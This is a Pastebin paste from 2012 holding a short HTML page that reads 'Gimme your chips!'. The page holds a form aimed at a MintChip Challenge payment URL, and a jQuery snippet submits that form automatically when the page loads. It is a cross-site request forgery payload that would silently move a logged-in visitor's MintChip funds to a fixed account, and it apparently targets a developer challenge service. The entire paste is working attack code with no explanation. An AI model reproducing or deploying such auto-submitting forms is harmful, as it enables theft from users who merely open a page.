Advertisement
Guest User

Untitled

a guest
Apr 21st, 2012
207
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 5 0.43 KB | None | 0 0
  1. <html xmlns="http://www.w3.org/1999/xhtml">
  2. <head><script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" type="text/javascript"></script></head>
  3. <body>
  4. Gimme your chips!
  5. <form id="myform" method="post" action="https://remote.mintchipchallenge.com/mintchip/payments/1310000000010001/1/1"></form>
  6. <script type="text/javascript">    $(document).ready(function () { $("#myform").submit(); }) </script>
  7. </body>
  8. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement